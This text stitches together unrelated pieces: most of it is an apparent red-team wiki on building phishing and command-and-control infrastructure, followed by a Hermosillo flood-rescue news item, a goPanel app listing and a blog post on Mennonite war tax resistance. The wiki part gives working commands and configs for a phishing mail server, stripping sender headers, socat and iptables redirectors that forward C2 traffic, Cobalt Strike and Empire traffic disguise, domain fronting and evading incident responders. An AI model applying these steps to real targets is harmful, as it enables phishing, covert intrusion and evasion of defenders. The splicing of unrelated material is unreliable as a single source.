Next, ssh into your phishing server and make sure you have a proper FQDN hostname listed in your /etc/hosts. Example "127.0.0.1 email.yourphishingserver.com email localhost"

Now you're going to install the web front-end to phish from in just a few easy steps. Start by downloading the latest beta version of iRedMail onto your phishing server. The easy way is to right-click the download button, copy the link address, and use wget to download it directly onto your phishing server. Next, untar it (tar -xvf iRedMail-0.9.8-beta2.tar.bz2), navigate into the unpacked folder, and make the iRedMail.sh script executable (chmod +x iRedMail.sh). Execute the script as root, follow the prompts, and reboot to finish everything.
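Collected into one place, the download-and-install sequence described above looks roughly like this (a sketch; the version number is the one mentioned in the text, and the download link placeholder stands in for the URL you copy from the iRedMail site):

```shell
# On the phishing server, as root:
wget <copied-download-link>/iRedMail-0.9.8-beta2.tar.bz2
tar -xvf iRedMail-0.9.8-beta2.tar.bz2
cd iRedMail-0.9.8-beta2
chmod +x iRedMail.sh
./iRedMail.sh      # follow the interactive prompts
reboot             # required to finish the installation
```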

You'll want to make sure you have all the proper DNS records pointing to your mail server (https://docs.iredmail.org/setup.dns.html). For DKIM, the new command to list your DKIM key is "amavisd-new showkeys".

For DMARC, we can use the wizard at (https://www.unlocktheinbox.com/dmarcwizard/) to generate our DMARC entry.
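As a sketch, the mail-related records end up looking something like the following zone fragment (the domain, IP, selector, and key values are placeholders; the real DKIM public key comes from your own `amavisd-new showkeys` output, and the DMARC policy from the wizard):

```
email.phishdomain.com.           IN A      203.0.113.10
phishdomain.com.                 IN MX 10  email.phishdomain.com.
phishdomain.com.                 IN TXT    "v=spf1 mx -all"
dkim._domainkey.phishdomain.com. IN TXT    "v=DKIM1; p=<public-key-from-amavisd-new-showkeys>"
_dmarc.phishdomain.com.          IN TXT    "v=DMARC1; p=quarantine; rua=mailto:postmaster@phishdomain.com"
```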

iRedMail Dashboard

Now, create a user to phish with.

iRedMail Create User

Login to the RoundCube interface with your new user and phish responsibly!

RoundCube Login

RoundCube Send Mail

Cobalt Strike Phishing

Cobalt Strike provides customizable spearphishing functionality to support pentest or red team email phishing. It supports templates in HTML and/or plaintext formats, attachments, a bounceback address, URL embedding, remote SMTP server usage, and per-message send delays. Another interesting feature is the ability to add a unique token to each user's embedded URL for click tracking.

Cobalt Strike Spearphishing Popup

For more detailed information, check out these resources:

Phishing Frameworks

Beyond rolling your own phishing setup or using a pentest or red teaming framework like Cobalt Strike, there are numerous tools and frameworks dedicated to email phishing. While this wiki won't go into detail about each framework, a few resources for each are collected below:

Gophish

Phishing Frenzy

The Social-Engineer Toolkit

FiercePhish (formerly FirePhish)

SMTP

“Redirector” may not be the best word to describe what we’re going to accomplish, but the goal is the same as with our other redirection. We want to remove any traces of our phishing origination from the final email headers and provide a buffer between the victim and our backend server. Ideally, the SMTP redirector will be quick to set up and easy to decommission.

There are two key actions we want to configure an SMTP redirector to perform:

Sendmail

Remove previous server headers

Add the following line to the end of /etc/mail/sendmail.mc:

define(`confRECEIVED_HEADER',`by $j ($v/$Z)$?r with $r$. id $i; $b')dnl

Add to the end of /etc/mail/access:

IP-to-Team-Server *TAB* RELAY
Phish-Domain *TAB* RELAY

Removing Sender’s IP Address From Email’s Received From Header

Removing Headers from Postfix setup

Configure a catch-all address

This will relay any email received to *@phishdomain.com to a chosen email address. This is highly useful to receive any responses or bounce-backs to a phishing email.

echo PHISH-DOMAIN >> /etc/mail/local-host-names

Add the following line right before //Mailer Definitions// (towards the end) of /etc/mail/sendmail.mc:

FEATURE(`virtusertable', `hash -o /etc/mail/virtusertable.db')dnl

Add the following line to the end of /etc/mail/virtusertable:

@phishdomain.com  external-relay-address

Note: The two fields should be tab-separated

Postfix

Postfix provides an easier alternative to sendmail with wider compatibility. Postfix also offers full IMAP support with Dovecot. This allows testers to correspond in real time with phishing targets who respond to the original message, rather than relying on the catch-all address and having to create a new message using your phishing tool.

A full guide to setting up a Postfix mail server for phishing is available in Julian Catrambone's (@n0pe_sled) post Mail Servers Made Easy.
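For the header-cleaning side of a Postfix relay, one common approach (a sketch, not the full configuration from the linked guide) is a `header_checks` regexp table that drops upstream Received headers before the message is relayed:

```
# /etc/postfix/main.cf
header_checks = regexp:/etc/postfix/header_checks

# /etc/postfix/header_checks
/^Received:/    IGNORE
```

After editing, reload Postfix (`postfix reload`); regexp tables do not require `postmap`.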

DNS

Sample DNS Redirector Setup

Note: When using C2 redirectors, a foreign listener should be configured on your post-exploitation framework to send staging traffic through the redirector domain. This will cause the compromised host to stage through the redirector like the C2 traffic itself.

socat for DNS

socat can be used to redirect incoming DNS packets on port 53 to our team server. While this method works, some users have reported staging and/or latency issues with Cobalt Strike when using it. Edit 4/21/2017: The following socat command seems to work well, thanks to testing from @xorrior:

socat udp4-recvfrom:53,reuseaddr,fork udp4-sendto:<IPADDRESS>:53

Redirecting Cobalt Strike DNS Beacons - Steve Borosh

iptables for DNS

iptables DNS forwarding rules have been found to work well with Cobalt Strike; iptables does not seem to exhibit the issues socat has handling this type of traffic.

An example DNS redirector rule-set is below.

iptables -I INPUT -p udp -m udp --dport 53 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination <IP-GOES-HERE>:53
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1

Also, change "FORWARD" chain policy to "ACCEPT"

DNS redirection can also be done behind NAT

Some may have the requirement or need to host a C2 server on an internal network. Using a combination of iptables, socat, and reverse SSH tunnels, we can certainly achieve this in the following manner.

Sample DNS NAT Setup

In this scenario, we have our volatile redirector using iptables to forward all DNS traffic using the rule example described earlier in this section. Next, we create an SSH reverse port-forward tunnel from our internal C2 server to our main redirector. This will forward any traffic the main redirector receives on port 6667 to the internal C2 server on port 6667. Now, start socat on our team server to fork any of the incoming TCP traffic on port 6667 to UDP port 53, which is what our DNS C2 needs to listen on. Finally, we similarly set up a socat instance on the main redirector to redirect any incoming UDP port 53 traffic into our SSH tunnel on port 6667.
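Under the assumptions of the diagram (the redirector is internet-facing, the internal C2 server can SSH out to it, and port 6667 is an arbitrary tunnel port), the three pieces described above might look like:

```shell
# On the internal C2 server: reverse-forward redirector port 6667 to local port 6667
ssh user@main-redirector -R 6667:localhost:6667

# On the internal C2 server: fork tunneled TCP 6667 back out as UDP 53 for the DNS listener
socat tcp4-listen:6667,reuseaddr,fork udp4-sendto:127.0.0.1:53

# On the main redirector: wrap incoming UDP 53 traffic into the SSH tunnel on 6667
socat udp4-recvfrom:53,reuseaddr,fork tcp4:127.0.0.1:6667
```

This mirrors the description above; hostnames, the user account, and the tunnel port are placeholders.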

HTTP(S)

Note: When using C2 redirectors, a foreign listener should be configured on your post-exploitation framework to send staging traffic through the redirector domain. This will cause the compromised host to stage through the redirector like the C2 traffic itself.

socat vs mod_rewrite

socat provides a ‘dumb pipe’ redirection. Any request socat receives on the specified source interface/port is redirected to the destination IP/port. There is no filtering or conditional redirecting. Apache mod_rewrite, on the other hand, provides a number of methods to strengthen your phishing and increase the resilience of your testing infrastructure. mod_rewrite has the ability to perform conditional redirection based on request attributes, such as URI, user agent, query string, operating system, and IP. Apache mod_rewrite uses htaccess files to configure rulesets for how Apache should handle each incoming request. Using these rules, you could, for instance, redirect requests to your server with the default wget user agent to a legitimate page on your target's website.

In short, if your redirector needs to perform conditional redirection or advanced filtering, use Apache mod_rewrite. Otherwise, socat redirection with optional iptables filtering will suffice.
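As an illustrative sketch of the conditional redirection described above (the user-agent pattern and destination URLs are assumptions for the example, not rules from the talk), an `.htaccess` ruleset that bounces default wget requests to the target's legitimate site while proxying everything else to the team server might look like:

```apache
RewriteEngine On
# Requests made with wget's default user agent get sent to the legitimate site
RewriteCond %{HTTP_USER_AGENT} "^Wget" [NC]
RewriteRule ^.*$ https://www.example.com/? [L,R=302]
# Everything else is proxied through to the back-end team server
# (the [P] flag requires mod_proxy to be enabled)
RewriteRule ^.*$ http://TEAMSERVER-IP%{REQUEST_URI} [P]
```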

socat for HTTP

socat can be used to redirect any incoming TCP packets on a specified port to our team server.

The basic syntax to redirect TCP port 80 on localhost to port 80 on another host is:

socat TCP4-LISTEN:80,fork TCP4:<REMOTE-HOST-IP-ADDRESS>:80

If your redirector is configured with more than one network interface, socat can be bound to a specific interface, by IP address, with the following syntax:

socat TCP4-LISTEN:80,bind=10.0.0.2,fork TCP4:1.2.3.4:80

In this example, 10.0.0.2 is one of the redirector's local IP addresses and 1.2.3.4 is the remote team server's IP address.

iptables for HTTP

In addition to socat, iptables can perform 'dumb pipe' redirection via NAT. To forward the redirector's local port 80 to a remote host, use the following syntax:

iptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination <REMOTE-HOST-IP-ADDRESS>:80
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1

SSH for HTTP

We have previously covered using SSH for DNS tunnels. SSH works as a solid and robust means to break through NAT and obtain a way for the implant to connect to a redirector and into your server environment. Before setting up an SSH redirector, you must add the following lines to /etc/ssh/sshd_config:

# Allow the SSH client to specify which hosts may connect
GatewayPorts yes

# Allow both local and remote port forwards
AllowTcpForwarding yes

To forward the redirector's local port 80 to your internal team server, use the following syntax on the internal server:

tmux new -S redir80
ssh <redirector> -R *:80:localhost:80
Ctrl+B, D

You can also forward more than one port, for example if you want 443 and 80 to be open all at once:

tmux new -S redir80443
ssh <redirector> -R *:80:localhost:80 -R *:443:localhost:443
Ctrl+B, D

Payloads and Web Redirection

When serving payload and web resources, we want to minimize the ability for incident responders to review files and increase the chances of successfully executing the payload, whether to establish C2 or gather intelligence.

Sample Apache Redirector Setup

Apache Mod_Rewrite usage and examples by Jeff Dimmock:

Other Apache mod_rewrite usage and examples:

To automatically set up Apache mod_rewrite on a redirector server, check out Julian Catrambone's (@n0pe_sled) blog post Mod_Rewrite Automatic Setup and the accompanying tool.

C2 Redirection

The intention behind redirecting C2 traffic is twofold: obscure the backend team server and appear to be a legitimate website if browsed to by an incident responder. Through the use of Apache mod_rewrite and customized C2 profiles or other proxying (such as with Flask), we can reliably filter the real C2 traffic from investigative traffic.

C2 Redirection with HTTPS

Building on "C2 Redirection" above, another method is to have your redirecting server use Apache's SSL Proxy Engine to accept inbound SSL requests and proxy those requests to a reverse-HTTPS listener. Encryption is used at all stages, and you can rotate SSL certificates on your redirector as needed.

To make this work with your mod_rewrite rules, you need to place your rules in "/etc/apache2/sites-available/000-default-le-ssl.conf" assuming you've used LetsEncrypt (aka CertBot) to install your certificate. Also, to enable the SSL ProxyPass engine, you'll need the following lines in that same config file:

# Enable the Proxy Engine
SSLProxyEngine On

# Tell the Proxy Engine where to forward your requests
ProxyPass / https://DESTINATION_C2_URL:443/
ProxyPassReverse / https://DESTINATION_C2_URL:443/

# Disable Cert checking, useful if you're using a self-signed cert
SSLProxyCheckPeerCN off
SSLProxyCheckPeerName off
SSLProxyCheckPeerExpire off

Other Apache mod_rewrite Resources

Cobalt Strike

Cobalt Strike modifies its traffic with Malleable C2 profiles. Profiles provide highly-customizable options for modifying how your server’s C2 traffic will look on the wire. Malleable C2 profiles can be used to strengthen incident response evasion, impersonate known adversaries, or masquerade as legitimate internal applications used by the target.

As you begin creating or modifying Malleable C2 profiles, it's important to keep data size limits in mind when choosing where Beacon info is placed. For example, configuring the profile to send large amounts of data in a URL parameter will require many requests. For more information about this, check out Raphael Mudge's blog post Beware of Slow Downloads.

If you encounter issues with your Malleable C2 profile and notice the teamserver console outputting errors, refer to Raphael Mudge's blog post Broken Promises and Malleable C2 Profiles for troubleshooting tips.

Empire

Empire uses Communication Profiles, which provide customization options for the GET request URIs, user agent, and headers. The profile consists of each element, separated by the pipe character, and set with the set DefaultProfile option in the listeners context menu.

Here is a sample default profile:

"/CWoNaJLBo/VTNeWw11212/|Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)|Accept:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*|Accept-Language:en-en"

Alternatively, the DefaultProfile value can be set by modifying the file /setup/setup_database.py before Empire’s initial setup. This will change the default Communication Profile that Empire will use.

In addition to the Communication Profile, consider customizing the Empire server's staging URIs, server headers, and default webpage content by following the steps presented in Joe Vest's (@joevest) post Empire - Modifying Server C2 Indicators.

Leveraging trusted, legitimate web services for C2 can provide a valuable leg-up over using domains and infrastructure you've configured yourself. Configuration time and complexity varies based on the technique and service being used. A popular example of leveraging third-party services for C2 redirection is Domain Fronting.

Domain Fronting

Domain Fronting is a technique used by censorship evasion services and apps to route traffic through legitimate and highly-trusted domains. Popular services that support Domain Fronting include Google App Engine, Amazon CloudFront, and Microsoft Azure. It's important to note that many providers, like Google and Amazon have implemented mitigations against Domain Fronting, so some linked resources or information provided in this wiki may be outdated by the time you try to use it.

In a nutshell, traffic uses the DNS and SNI name of the trusted service provider, Google is used in the example below. When the traffic is received by the Edge Server (ex: located at gmail.com), the packet is forwarded to the Origin Server (ex: phish.appspot.com) specified in the packet’s Host header. Depending on the service provider, the Origin Server will either directly forward traffic to a specified domain, which we’ll point to our team server, or a proxy app will be required to perform the final hop forwarding.
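The routing trick can be illustrated with a single request (a sketch: `phish.appspot.com` is a hypothetical Origin Server name, and as noted above Google has since deployed mitigations, so this exact request may no longer work):

```shell
# DNS and SNI point at www.google.com; the Host header steers the
# edge server to the fronted app instead
curl -s https://www.google.com/ -H "Host: phish.appspot.com"
```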

Domain Fronting Overview

For more detailed information about how Domain Fronting works, see the whitepaper Blocking-resistant communication through domain fronting and the TOR Project’s meek documentation

In addition to the standard frontable domains, such as any google.com domain, it's possible to leverage other legitimate domains for fronting.

For more information about hunting frontable domains, check out:

Further Resources on Domain Fronting

PaaS Redirectors

Many PaaS and SaaS providers provide a static subdomain or URL for use with a provisioned instance. If the associated domain is generally highly trusted, the instances could provide extra trust to your C2 infrastructure over a purchased domain and VPS.

To set the redirection up, you will need to identify a service that issues a static subdomain or URL as part of an instance. Then, either the instance will need to be configured with network or application-based redirection. The instance will act as a proxy, similar to the other redirectors discussed on this wiki.

Specific implementation can vary greatly based on the service; however, for an example using Heroku, check out the blog post Expand Your Horizon Red Team – Modern SaaS C2 by Alex Rymdeko-Harvey (@Killswitch_GUI).

Another interesting technique that merits further research is the use of overly-permissive Amazon S3 buckets for C2. Check out the post S3 Buckets for Good and Evil by Andrew Luke (@Sw4mp_f0x) for more details on how S3 buckets could be used for C2. This technique could be combined with the third-party C2 capabilities of Empire to use the target's legitimate S3 buckets against them.

For another example of using PaaS for C2, check out Databases and Clouds: SQL Server as a C2 by Scott Sutherland (@_nullbind).

Other Third-Party C2

Other third-party services have been used in the wild for C2 in the past. Leveraging third-party websites that allow for the rapid posting or modification of user-generated content can help you evade reputation-based controls, especially if the third-party site is generally trusted.

Check out these resources for other third-party C2 options:

Attack infrastructure is often easy to identify, appearing like a shell of a legitimate server. We will need to take additional steps with our infrastructure to increase the likelihood of blending in with real servers amongst either the target organization or services the target may conceivably use.

Redirectors can help blend in by redirecting invalid URIs, expiring phishing payload links, or blocking common incident responder techniques; however, attention should also be paid to the underlying host and its indicators.

For example, in the post Fall of an Empire, John Menerick (@Lord_SQL) covers methods to detect Empire servers on the internet.

To combat these and similar indicators, it's a good idea to modify C2 traffic patterns, modify server landing pages, restrict open ports, and modify default response headers.

For more details about how to do these and other tactics for multiple attack frameworks, check out these posts:

Attack infrastructure can be attacked just the same as any other internet-connected host, and it should be considered HIGHLY sensitive due to the data in use and connections into target environments.

In 2016, remote code execution vulnerabilities were disclosed on the most common attack tools:

iptables should be used to filter unwanted traffic and restrict traffic between required infrastructure elements. For example, if a Cobalt Strike team server will only serve assets to an Apache redirector, iptables rules should only allow port 80 from the redirector’s source IP. This is especially important for any management interfaces, such as SSH or Cobalt Strike’s default port 50050. Also consider blocking non-target country IPs. As an alternative, consider using hypervisor firewalls provided by your VPS providers. For example, Digital Ocean offers Cloud Firewalls that can protect one or multiple droplets.
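For the Cobalt Strike example above, a minimal rule set might look like the following sketch (REDIRECTOR-IP and ADMIN-IP are placeholders; this assumes you lock INPUT down to a default-drop policy):

```shell
# Always allow loopback and established connections
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

# Web traffic only from the Apache redirector
iptables -A INPUT -p tcp -s REDIRECTOR-IP --dport 80 -j ACCEPT

# SSH and the Cobalt Strike management port only from a trusted admin IP
iptables -A INPUT -p tcp -s ADMIN-IP --dport 22 -j ACCEPT
iptables -A INPUT -p tcp -s ADMIN-IP --dport 50050 -j ACCEPT

# Drop everything else
iptables -P INPUT DROP
```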

chattr can be used on team servers to prevent cron directories from being modified. Using chattr, you can restrict any user, including root, from modifying a file until the chattr attribute is removed.
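For example (assuming the system cron files you want to protect live in the usual locations):

```shell
# Make the system crontab immutable; even root must clear the flag before editing
chattr +i /etc/crontab
lsattr /etc/crontab    # the 'i' attribute should now be listed

# Remove the flag later when a legitimate change is needed
chattr -i /etc/crontab
```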

SSH should be limited to public-key authentication only and configured to use limited-rights users for initial login. For added security, consider adding multi-factor authentication to SSH.
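A minimal `/etc/ssh/sshd_config` fragment implementing those recommendations (a sketch; the username is a placeholder, and MFA would be layered on top via PAM):

```
# Public-key authentication only
PasswordAuthentication no
ChallengeResponseAuthentication no
PubkeyAuthentication yes

# No direct root logins; log in as a limited-rights user and escalate afterward
PermitRootLogin no
AllowUsers opsuser
```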

Update! No hardening list is complete without a reminder to regularly update systems and apply hotfixes as needed to remediate vulnerabilities.

Of course, this list is not exhaustive of what you can do to secure a team server. Follow common hardening practices on all infrastructure:

Specific Hardening Resources

There are a number of resources available online discussing the secure setup and design of infrastructures. Not every design consideration will be appropriate for every attack infrastructure, but it's useful to know what options are available and what other testers are doing.

Here are some of those resources:

The topics covered in this wiki strengthen attack infrastructures, but generally require a good deal of time to design and implement. Automation can greatly reduce deployment times, allowing you to deploy more complex setups in less time.

Check out these resources about attack infrastructure automation:

  • Document everything - Running a complex Red Team infrastructure means many moving parts. Be sure to document each asset’s function and where its traffic is sent.

  • Split assets among different service providers and regions - Infrastructure assets should be spread across multiple service providers and geographic regions. Blue Team members may raise monitoring thresholds against providers identified as actively performing an attack and may even outright block a given service provider. Note: keep international privacy laws in mind if sending encrypted or sensitive data across borders.

  • Don't go overboard - It's easy to get excited about advanced techniques and want to throw the kitchen sink at a target. If you are emulating a specific adversarial threat, only leverage techniques the real threat actor used or techniques within that actor's skillset. If your red team will attack the same target long-term, consider starting "easy" and working through more advanced tradecraft as the assessments go on. Evolving the red team's techniques alongside the blue team's will consistently push the organization forward, whereas hitting the blue team with everything at once may overwhelm it and slow the learning process.

  • Monitor logs - All logs should be monitored throughout the engagement: SMTP logs, Apache logs, tcpdump on socat redirectors, iptables logs (specific to traffic forwarding or targeted filtering), web logs, Cobalt Strike/Empire/MSF logs. Forward logs to a central location, such as with rsyslog, for easier monitoring. Retaining operator terminal data may come in handy for reviewing historical command usage during an operation. @Killswitch_GUI created an easy-to-use program named lTerm that will log all bash terminal commands to a central location. Log all terminal output with lTerm. Check out Vincent Yiu's post CobaltSplunk for an example of how to send Cobalt Strike logs to Splunk for advanced infrastructure monitoring and analysis.

  • Implement high-value event alerting - Configure the attack infrastructure to generate alerts for high-value events, such as new C2 sessions or credential capture hits. One popular way of implementing alerting is via a chat platform's API, such as Slack. Check out the following posts about Slack alerting: Slack Shell Bot - Russel Van Tuyl (@Ne0nd0g), Slack Notifications for Cobalt Strike - Andrew Chiles (@AndrewChiles), Slack Bots for Trolls and Work - Jeff Dimmock (@bluscreenofjeff)

  • Fingerprint incident response - If possible, try to passively or actively fingerprint IR actions before the assessment starts. For example, send a mediocre phishing email to the target (using unrelated infrastructure) and monitor traffic that infrastructure receives. IR team investigations can disclose a good deal of information about how the team operates and what infrastructure they use. If this can be determined ahead of the assessment, it can be filtered or redirected outright.
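As one example of the centralized log collection mentioned above, each redirector can ship its logs to a collector with rsyslog (the collector IP is a placeholder):

```shell
# On each redirector: forward everything to the central collector over TCP ("@@" = TCP)
cat >> /etc/rsyslog.conf <<'EOF'
*.* @@203.0.113.50:514
EOF
service rsyslog restart

# On the collector: accept TCP syslog on port 514
cat >> /etc/rsyslog.conf <<'EOF'
module(load="imtcp")
input(type="imtcp" port="514")
EOF
service rsyslog restart
```

Remember to permit the collector port in the firewall rules between infrastructure elements only.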

A BIG THANK YOU to all the following people (listed alphabetically) who contributed tools, tips, or links to include in the wiki, and another THANK YOU to anyone who wrote a tool or post referenced in this wiki!


          Three rescued from arroyo west of Hermosillo
Three people were rescued from inside an arroyo west of the city, none in serious condition, according to what the Municipal Civil Protection Unit of Hermosillo (UMPC) has recorded so far.

Officials reported that the people were in the San Patricio arroyo, located at Carlos Quintero Arce and Rafael Sesma Verdugo, where the three were rescued.

The rain began at 7:11 p.m. today, entering through the east side of the city. The largest accumulation was recorded in the area known as La Finca, in San Pedro, El Saucito, at 35.31 millimeters, with winds of up to 45 kilometers per hour.

In the ejido La Victoria, near CIAD, 28.19 millimeters of rain fell, with maximum winds of 29 kilometers per hour; northern Hermosillo recorded 8.38 millimeters, the south 20.57, the west 13.21 and the center 25.65 millimeters.

The report added that flooded homes were reported on Apache Norte and Chiricahua streets, in the El Apache neighborhood, but the situation was not serious. The Fire Department said flooding was also reported in the Las Minitas neighborhood, but the report proved unfounded.
          goPanel 2.0.3 - Manage Web servers. (Shareware)

goPanel is an intuitive OS X app for managing web servers, an alternative to the control-panel apps you install on Unix-based servers for web hosting. Easily install and configure the Apache or Nginx web server, PHP, MySQL, FTP, domains, free SSL certificates and email on your server. goPanel lets you connect to and manage unlimited Linux servers.

Features
  • Add and manage unlimited servers (VPS or dedicated)
  • Install, configure and manage: Apache or Nginx, PHP, FTP (Pure-FTPd), MySQL or MariaDB, Mail Server to get each of your servers ready to host domains
  • PHP and Apache on/off from selection of modules
  • Unlimited MySQL/MariaDB users and databases, domains, ftp accounts and emails
  • Unlimited free SSL certs issued by Let’s Encrypt certificate authority
  • Fail2Ban intrusion prevention software Install and Configure
  • Setup scheduled cron jobs
  • Setup backup for your files or databases
  • View server logs and block IPs
  • Rollback up to 50 earlier versions of your config files in case you need to
  • System updates - keep your linux server up to date
  • 3rd-party scripts:
    • WP-CLI + One-click Wordpress installer
    • Composer (application-level package manager)
    • PHPMyAdmin(database manager)
    • Webmailer (roundcube)

goPanel works perfectly with Amazon instances and Digital Ocean droplets as long as you use a supported Linux distribution. Make sure your Linux server does not already have any of the services installed, and install all services from the goPanel app: migration from servers with existing services is not yet possible.



Version 2.0.3:
  • Support for Raspbian
  • Support for CentOS 6.10
  • Small fixes


Requirements
  • OS X 10.10 or later



          Tax Resistance in “The Mennonite”, 1990 · TPL

This is the thirty-sixth in a series of posts about war tax resistance as it was reported in back issues of The Mennonite. Today we enter the 1990s.

The Mennonite

The issue introduced The Mennonite readers to the tax resistance campaign organized by Palestinian Christians in Beit Sahour in response to the Israeli occupation. Excerpts:

In residents began refusing to pay taxes to the Israeli occupiers. Tax money should go for roads, health and local services, they said. But the occupiers were supplying none of these services. Instead they used taxes to fund the military occupation. Residents adopted the slogan “No taxation without representation.”

The authorities responded with nightly curfews, mass arrests and a strong troop presence in the town. But residents still did not pay their taxes. For six weeks in , Israeli troops sealed off the town. They seized property and belongings from businessmen and families who had not paid taxes. Tax officials went from house to house humiliating and beating people, according to a account in the Jerusalem Post.

Israeli tax officials confiscated without trial several million dollars worth of property. The tax siege has now been lifted, but Beit Sahour residents still refuse to pay taxes.

A set of articles on war tax resistance appeared in the edition. The first, by Linda Peachey, explained why she took the issue seriously:

I recently attended a meeting that focused on the question of paying the military portion (about 50 percent) of our [U.S.] federal income taxes. I left the meeting troubled, not because there were varying viewpoints but because many people appeared unconcerned about the issue and failed to address what I believe are key questions on the matter.

The question for me is not whether we should honor our government or whether a government has the right to collect taxes. The crux of the matter is to determine when Caesar’s demands conflict with our obedience to God. I fear that if I were to give Caesar all that he demands in war taxes, I would fail to honor God in four important ways.

  1. I fear that by paying the military portion of my income taxes I fail to trust God alone for my security. Throughout history nations have tried to secure their well-being and safety through military solutions. Again and again in the Bible God asks us to resist such solutions and to trust him instead:

    War horses are useless for victory; their great strength cannot save. The Lord watches over those who have reverence for him, those who trust in his constant love. He saves them from death… We put our hope in the Lord; he is our protector and our help (Psalm 33:17-20).

    If I work several months each year to pay my nation’s military dues, am I not giving legitimacy to the military establishment’s answers for my security? If I am willing to invest so much of my time and energy in a military solution, can I honestly say that God is my protector?

  2. I fear that by paying my war taxes I fail to give my primary loyalty to Christ’s worldwide church. My war taxes would purchase planes, bombs, guns and military training to be used in Third World settings. Although our country is not involved in any declared war, our military might is felt keenly in Central America, the Philippines and the Middle East.

    In fact, in recent years the United States has adopted a policy of promoting “low-intensity conflict” in countries that threaten to move out from under our sphere of influence. This means keeping warfare away from the American public eye and avoiding the involvement of American soldiers in the fighting. Yet our brothers and sisters in Christ do die in the struggle. Can I say that my first loyalty is to the worldwide kingdom of God if I comply with structures that do violence to my neighbors around the world?

  3. I fear that by paying my war taxes I fail to follow Christ as he calls me to love all people, even my enemies. In Matthew 5 Jesus no doubt surprised his listeners by challenging them to love not only their friends but all people, just as God does. This has not been an easy teaching for the church. Peter struggled with it when he was called to go to Cornelius, a gentile, and Paul reminded the early church often that the gospel was not only for Jews but also for gentiles.

    Ephesians 2:14 points this out: “For Christ himself has brought us peace by making Jews and gentiles one people. With his own body he broke down the wall that separated them and kept them enemies.” Do we believe that this can also apply to Americans and Soviets, rich and poor, capitalist and communist? Can I believe this and at the same time contribute to the forces that are designed to destroy these very people whom Christ called me to love?

  4. I fear that by paying my war taxes I fail to respect God’s creation. In today’s world, militarism not only threatens people but all of creation as well. While militarism is not the only way we dishonor God’s creation, it is through nuclear weapons that we dare to threaten all that God has made. Can I claim to truly honor God if I continue to help pay for such weapons?

I think these questions have special poignancy for us as Mennonites. We claim to be conscientious objectors to war. Yet in a low-intensity conflict or in a nuclear war it is almost irrelevant to say that we will not serve in the military. These kinds of wars do not demand our bodies but our dollars and our consent. Thus we cannot ignore this issue of war taxes.

I recognize that sincere people differ on this issue. Some encourage elected leaders to reorder our nation’s priorities. Some give away more of their income so that they owe less income tax. Some live in community so that they can live on lower incomes. Some withhold a symbolic amount of all of their military taxes. Some support legislative efforts that would allow conscientious objectors to designate the military portion of their federal taxes to a peace tax fund. What is important is not so much that we all agree but that we agonize together on these questions.

Let us pray for wisdom as we wrestle with what this issue means for our faith in God, our witness as a Christian church, our faithfulness to Christ and our reverence for God’s creation.

This was accompanied by a sidebar invitation for people to redirect their taxes through “the Taxes for Peace fund.” It added that “In , $5750 in Taxes for Peace funds were divided between the National Campaign for a Peace Tax Fund and Christian Peacemaker Teams; 1990 contributions will be divided the same way.”

Turn the page to find this news:

Members of St. Louis Mennonite Fellowship recently passed a proposal to faithfully resist payments of the U.S. federal phone tax applied monthly to the fellowship’s phone bill. The revenues will be redirected to Mennonite Central Committee. “We wish to respect the convictions of our members and Anabaptist forebears and to be disciplined followers of Jesus Christ,” said Scott Neufeld, coordinator of St. Louis Mennonite Peace Witness. Federal phone tax revenues, first collected in , contribute directly to the U.S. Armed Forces and other systems of war, Neufeld said.

The edition included Craig Morton’s article: “Render taxes to whom?” Excerpts:

Looking at our Anabaptist heritage and looking at our Scriptures in light of contemporary political realities, we do not have to be pressed to pray for peace while paying for war. Our spiritual authority in Jesus Christ, as expressed by apostles and Anabaptist forebears, allows and empowers us to make the difficult decision to withhold war taxes. Balthasar Hubmaier, writing about taxes paid to an unjust government, states, “…to come to the point, God will excuse us for nothing on the account of unjust superiors…” (Anabaptism in Outline, Klassen, p. 246). The U.S. government has become unjust, and when a government is unjust, it has forfeited the right to expect my taxes.

As Christians and Anabaptists, we have a rich tradition of conscience. In some ways we even have a tradition of anarchy. Anarchy in the eyes of the world, that is, for we may claim a greater authority — God.…

The early Anabaptists — Menno Simons, Balthasar Hubmaier, Jacob Hutter and Peter Rideman — all spoke out on the proper attitude of a Christian toward government, on paying taxes used for war and on the production of weapons of violence. For Anabaptist Christians the issue to pay or not to pay war taxes has a significant history.

Jacob Hutter wrote, “For how can we be innocent before our God if we do not go to war ourselves but give the money that others may go in our place? We will not become partakers of the sin of others and dishonor and despise God” (“Plots and Excuses,” Klassen p. 252). While this may refer to the practice of paying one’s way out of military service by supplying a replacement, it still holds true that aiding the carrying out of violence indirectly indicts the taxpayer as a participant in the violence enacted. Similarly Peter Rideman asserts that one has a responsibility not only for what one produces but also for how those products are used by others. Rideman states that Christians cannot build weapons of violence, even if they do not use those products themselves. The one who produces weapons is responsible for the violence inflicted.

But the issue of our history as Christians and as Anabaptists concerning the issue of war tax resistance is made more difficult because of our reading of the biblical texts relating to government, particularly Matthew 22:21 (and other texts referring to government, e.g. Romans 13 and 1 Peter 2:14). In any discussion of war tax resistance among Christians, the words of Jesus are almost always quoted, “…render to Caesar the things that are Caesar’s and to God the things that are God’s.” However, if we look closely at the political and historical context of these biblical texts, we have to ask ourselves how we can apply Jesus’ response in Matthew 22:21 to ourselves in our political and historical situation.

